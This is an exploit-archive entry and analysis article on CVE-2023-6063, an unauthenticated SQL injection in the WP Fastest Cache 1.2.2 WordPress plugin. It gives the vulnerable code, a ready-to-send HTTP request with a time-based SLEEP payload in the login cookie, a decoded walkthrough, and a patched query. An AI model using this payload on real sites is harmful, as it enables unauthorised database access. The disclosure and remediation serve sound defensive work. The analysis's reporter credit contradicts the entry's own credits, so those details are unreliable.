WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection

Exploit Author: Meryem Taşkın Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2024-02-28 
# Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2
# Date: 14.11.2023
# Exploit Author: Meryem Taşkın
# Vendor Homepage: https://www.wpfastestcache.com/
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
# Version: WP Fastest Cache 1.2.2
# Tested on: WP Fastest Cache 1.2.2
# CVE: CVE-2023-6063
 
## Description
An SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication.
 
## Vuln Code
 
public function is_user_admin(){
            global $wpdb;
            foreach ((array)$_COOKIE as $cookie_key => $cookie_value){
                if(preg_match("/wordpress_logged_in/i", $cookie_key)){ 
                    $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value); 
                    break;
                }
            }
            if(isset($username) && $username){            
                $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`
                                       FROM `$wpdb->users`
                                       INNER JOIN `$wpdb->usermeta`
                                       ON `$wpdb->users`.`user_login` = \"$username\" AND  # $username varible is not escaped vulnerable to SQL injection
                                       .....
 
## Exploit
GET / HTTP/1.1
Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221
Host: meryem.local
 
## Parameter: Cookie #1* ((custom) HEADER)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg
---
 
## References
- [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)
- [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/)
- [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063)
 
## Credits
- Original Researcher: Alex Sanford
- PoC: Meryem Taşkın


Unauthenticated SQL Injection in WP Fastest Cache 1.2.2: A Critical Security Flaw Exploited in the Wild

On November 14, 2023, a critical vulnerability was disclosed in WP Fastest Cache 1.2.2, a widely used WordPress plugin designed to optimize site performance through caching mechanisms. This flaw, identified as CVE-2023-6063, enables attackers to execute arbitrary SQL queries without authentication—making it one of the most dangerous vulnerabilities in the WordPress ecosystem.

Understanding the Vulnerability

The core issue lies in the is_user_admin() function, which attempts to determine whether a user is logged in by parsing the wordpress_logged_in cookie. The function retrieves the username from the cookie value using a regex pattern:


public function is_user_admin(){
    global $wpdb;
    foreach ((array)$_COOKIE as $cookie_key => $cookie_value){
        if(preg_match("/wordpress_logged_in/i", $cookie_key)){ 
            $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value); 
            break;
        }
    }
    if(isset($username) && $username){ 
        $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`
        FROM `$wpdb->users`
        INNER JOIN `$wpdb->usermeta`
        ON `$wpdb->users`.`user_login` = \"$username\" AND # $username variable is not escaped, vulnerable to SQL injection
        ...
    }
}

Here, the $username variable is directly inserted into a SQL query without proper sanitization or escaping. This opens the door to SQL injection attacks—even when the user is not authenticated.

Exploitation: Time-Based Blind SQL Injection

Attackers can exploit this flaw via a simple HTTP request with a malicious cookie. The payload leverages time-based blind SQL injection, a technique that delays the response to confirm whether a query is executed.

Example exploit:


GET / HTTP/1.1
Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221
Host: meryem.local

Decoded, this cookie value becomes:


" AND (SELECT 1 FROM (SELECT(SLEEP(5)))A) AND "1"="1

When this cookie is processed, the SQL query becomes:


SELECT ID, user_login, meta_key, meta_value
FROM wp_users
INNER JOIN wp_usermeta
ON wp_users.user_login = " AND (SELECT 1 FROM (SELECT(SLEEP(5)))A) AND "1"="1

The injected condition SLEEP(5) causes the database to pause for five seconds if the query is executed, allowing attackers to detect the vulnerability based on response time.

Impact and Risk Assessment

This vulnerability is particularly dangerous because:

  • Unauthenticated access: No login or session is required to trigger the injection.
  • Blind exploitation: Attackers can infer database behavior without direct output.
  • Remote code execution potential: While not directly possible, SQL injection can lead to data exfiltration, database manipulation, or chain attacks.
  • High prevalence: WP Fastest Cache is one of the most popular caching plugins, with thousands of installations worldwide.

Even if the attacker cannot extract data directly, the ability to delay queries can be used for fingerprinting, denial-of-service attacks, or probing other vulnerabilities.

Real-World Implications

Consider a scenario where a WordPress site using WP Fastest Cache 1.2.2 is publicly exposed. An attacker could:

  • Send a crafted request with a time-based payload to test if the system is vulnerable.
  • Use the same technique to extract information through boolean-based or error-based injection if the database returns error messages.
  • Chain the vulnerability with other flaws (e.g., file inclusion or remote code execution) to escalate privileges.

Moreover, automated scanners like WPScan can detect this flaw in seconds, making it a prime target for mass exploitation.

Corrected Code and Best Practices

The fix requires proper sanitization of user input. The vulnerable line should use $wpdb->prepare() to escape variables safely:


$res = $wpdb->get_var($wpdb->prepare(
    "SELECT u.ID, u.user_login, um.meta_key, um.meta_value
    FROM $wpdb->users u
    INNER JOIN $wpdb->usermeta um
    ON u.user_login = %s",
    $username
));

Using $wpdb->prepare() ensures that the $username value is properly escaped and prevents SQL injection attacks.

Key security principles:

  • Never trust user input, even from cookies.
  • Always use prepared statements in WordPress database queries.
  • Sanitize and validate all data before use.
  • Implement input validation at the earliest stage.

Vendor Response and Mitigation

The vulnerability was reported by Meryem Taşkın and confirmed by Alex Sanford. The vendor, WP Fastest Cache, released a patch in version 1.2.3, which includes the necessary fixes. Site administrators are strongly advised to:

  • Update to WP Fastest Cache 1.2.3 or later.
  • Monitor for signs of exploitation (e.g., unusual database delays or log entries).
  • Use security plugins like WPScan or Sucuri to scan for known vulnerabilities.

References and Resources

Resource Link
WPScan Blog Post Unauthenticated SQL Injection in WP Fastest Cache 1.2.2
WPScan Vulnerability Database CVE-2023-6063
CVE Database CVE-2023-6063

Security professionals must remain vigilant: even well-intentioned plugins can introduce critical flaws. Always audit third-party code, keep systems updated, and enforce secure coding practices.